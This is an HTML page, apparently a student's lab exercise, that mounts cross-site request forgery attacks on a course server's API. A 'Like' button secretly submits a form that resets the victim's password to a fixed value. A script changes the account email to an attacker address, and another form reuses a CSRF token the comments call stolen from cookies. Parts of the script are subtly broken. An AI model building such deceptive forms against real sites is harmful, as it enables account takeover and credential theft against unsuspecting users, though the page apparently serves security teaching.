<!DOCTYPE html/>
<html>
    <head>
        <meta content="text/html;charset=utf-8" http-equiv="Content-Type">
        <meta content="utf-8" http-equiv="encoding">
    </head>
    <script>
        var username;
        fetch("https://m183.gibz-informatik.ch/api/csrf/getUsername")
        .then(function(response) {
            console.log(response);// cors 401 in allen Browsern
            username = response.text();
        });

        if (username != undefined) {
            document.getElementById("username").value = username;
            document.getElementById("username").style.visibility = hidden;
        }

        var sendEmail = function() {
            fetch("https://m183.gibz-informatik.ch/api/csrf/changeEmail", {
                method: "POST",
                body:  JSON.stringify({
                    csrf: "1YTwe13aM5gEA4xq9dOZ"
                })
            })
            fetch("https://m183.gibz-informatik.ch/api/csrf/changeEmail", {
                method: "POST",
                body:  JSON.stringify({
                    email: "pwnd@gibz.ch"
                })
            })
        }
    </script>
    <body>
        Password:<br>
        <form action="https://m183.gibz-informatik.ch/api/csrf/changePassword" method="POST">
            Username: <input name="username" id="username"/>
            <input name="password" value="Pa$$w0rd" hidden>
            <button>Like</button>
        </form><br>

        Email:<br>
        <button onclick="sendEmail()">submit</button>
    
        Text:<br>
        <form action="https://m183.gibz-informatik.ch/api/csrf/postMessage" method="POST" >
            <textarea name="message" placeholder="Hi"></textarea><br>^
            <input name="csrf" value="SeSmlbvDgviZBxIzmRzs"> <!--token stolen from cookies-->
            <button>submit</button>
        </form> 
    </body>
</html>